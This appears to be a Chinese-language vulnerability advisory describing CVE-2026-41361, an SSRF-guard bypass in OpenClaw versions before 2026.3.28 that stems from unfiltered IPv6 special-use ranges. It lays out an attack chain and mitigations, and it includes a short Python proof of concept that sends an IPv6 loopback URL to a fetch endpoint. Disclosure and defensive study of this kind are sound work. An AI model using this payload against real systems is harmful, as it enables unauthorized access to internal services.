IPBUF安全漏洞报告
English
CVE-2026-41361 CVSS 7.1 高危

CVE-2026-41361 OpenClaw SSRF防护绕过漏洞

披露日期: 2026-04-23

漏洞信息

漏洞编号
CVE-2026-41361
漏洞类型
SSRF (服务端请求伪造)
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

SSRFOpenClawIPv6BypassCWE-918

漏洞概述

OpenClaw 2026.3.28 之前版本存在 SSRF 防护绕过漏洞。该漏洞源于未能正确过滤四个 IPv6 特殊用途地址范围。攻击者可利用此漏洞,构造指向内部网络或不可路由 IPv6 地址的恶意 URL,从而成功绕过 SSRF 安全防护机制,访问受限资源。

技术细节

该漏洞的根源在于 OpenClaw 应用程序中的 SSRF 防护逻辑存在缺陷。在验证目标 URL 的 IP 地址时,代码未能完整覆盖 IPv6 协议定义的所有特殊用途地址范围,具体遗漏了四个关键范围(可能涉及 v4-mapped IPv6 或本地链路地址)。攻击者可以通过精心构造包含这些特殊 IPv6 地址的 HTTP 请求,欺骗服务器认为目标地址是公网可路由的。一旦请求通过验证,服务器将代为攻击者向内网发起连接,导致 SSRF 防护被完全绕过,进而可能泄露敏感内网信息或对内部服务进行进一步攻击。此漏洞利用了 IPv6 地址格式的复杂性,绕过了传统的基于 IPv4 或标准 IPv6 范围的防御机制。

攻击链分析

STEP 1
侦察
攻击者识别出目标正在运行 OpenClaw 2026.3.28 之前的版本。
STEP 2
构造载荷
攻击者构造一个包含未被过滤的特殊 IPv6 地址(如 IPv6 本地回环地址或链路本地地址)的 URL。
STEP 3
发送请求
攻击者向存在漏洞的 OpenClaw 端点发送包含恶意 URL 的请求。
STEP 4
绕过防护
OpenClaw 的 SSRF 防护机制未能识别该 IPv6 地址为内部地址,允许请求通过。
STEP 5
内网探测
服务器代为攻击者请求内部 IPv6 地址,返回敏感信息或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target vulnerable OpenClaw instance target_url = "http://vulnerable-openclaw-instance/api/fetch" # Payload using IPv6 loopback address to bypass SSRF guard # The vulnerability misses 4 special IPv6 ranges, ::1 is a common example of a local address malicious_url = "http://[::1]:8080/admin/config" payload = { "url": malicious_url } try: # Send the malicious request response = requests.post(target_url, data=payload) # Check if the internal resource was accessed (SSRF successful) if response.status_code == 200 and "admin" in response.text: print("[+] SSRF Bypass Successful! Internal resource accessed.") print("[+] Response:", response.text[:200]) else: print("[-] SSRF Bypass failed or blocked.") print("[-] Status Code:", response.status_code) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施
如果无法立即升级,建议在网络边界设备上配置严格的出站访问控制列表(ACL),明确阻止所有非公网路由的 IPv6 地址段。同时,应在应用层面对所有传入的 URL 参数进行增强型验证,不仅检查 IPv4,还需全面解析并拦截 IPv6 特殊用途地址。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表